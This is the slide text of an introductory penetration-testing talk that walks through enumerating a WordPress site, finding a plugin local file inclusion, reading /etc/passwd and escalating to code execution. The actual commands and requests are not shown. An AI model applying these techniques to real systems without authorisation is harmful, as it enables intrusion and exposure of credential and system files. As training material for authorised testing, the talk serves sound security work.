Introduction to Penetration Testing

Table of Contents

• Overview• Enumeration• Tool Output• Do We Stop Here?• Custom Scripts• Wpscan• Online Research• Testing Exploitation• PHP LFI• Code Execution, Yes Please!

Overview

• This session will cover the mindset I follow when approaching a web application

• I am going to show where many might stop, and what happens when you push further

• These types of techniques can be applied to any web application

Overview Cont.

• Tools Leveraged:

– Nmap

– Whatweb

– Wpscan

– Wget

– Custom scripts

– Burp Suite

– Netcat

– Google

Methodology Overview

• Pre-Engagement Activities – Hammer out all the details to conduct the test (Schedule,

Scoping, Rules of Engagement, Formal Permission, etc.)

• Information Gathering and Reconnaissance– Depends on type of test and information you are given

(Organization name, CIDR, list of URLs, source code, etc.)

• Automated Testing

• Manual Testing and Validation

• Reporting

• Remediation Support

Methodologies Cont.

• Penetration Testing Execution Standard (PTES):

– http://www.pentest-standard.org/index.php/Main_Page

Mindset is Key

• Think like an attacker and see things through a different lens:

– Upload an avatar? Hmmm add code?

– Download a report? Hmm directory traversal for another file?

• Confidence

– Without it you’ll very easily hit a wall and stop

– I tell myself a vulnerability is here I just need to find it

Enumeration

• Nmap:

• WhatWeb:

Do We Stop Here?

• Hmmm?

Custom Scripts

• Web Application testing requires custom scripting….really no way getting around it:

Custom Scripts Cont.

• Making web requests with a scripting language isn’t too difficult

• Check out tutorials online and try to automate web requests

• Making a tool for CVE-2012-1823 is a good use case because you need to make a POST request and modify several header values– If you can write a tool for this CVE, it demonstrates

concepts that can be applied to many different CVEs

Wpscan

• Wpscan:

Wpscan

• Do we stop here?

Wpscan : Plugin Enumeration

• Wpscan: --enumerate p

Online Research

Online Research Cont.

• Hmm, our web server doesn’t respond when we request “/wordpress/wp/wp-content/”

• Do we stop here?

Testing Exploitation

• Yea, lets grap “/etc/passwd”

PHP LFI

• Cool, so we can LFI, do we stop now?

PHP LFI…Now What?

• What can be done with a PHP LFI?

• It depends on what function is leading to the LFI vulnerability (include(), readfile(), etc.)

• PHP functions like include() will execute PHP code in the included file– Yay code execution through php snippets!

• PHP functions like readfile() will only display output– We have more work to do

Code Execution? Yes, Please!

Code Execution? Yes, Please!

• Request:

Demo

Summary

• Tools may not give you the answer

• Very easy to hit a hurdle and quit

• You need to be curious/creative and constantly push to get more information

• Confidence and mindset goes a long way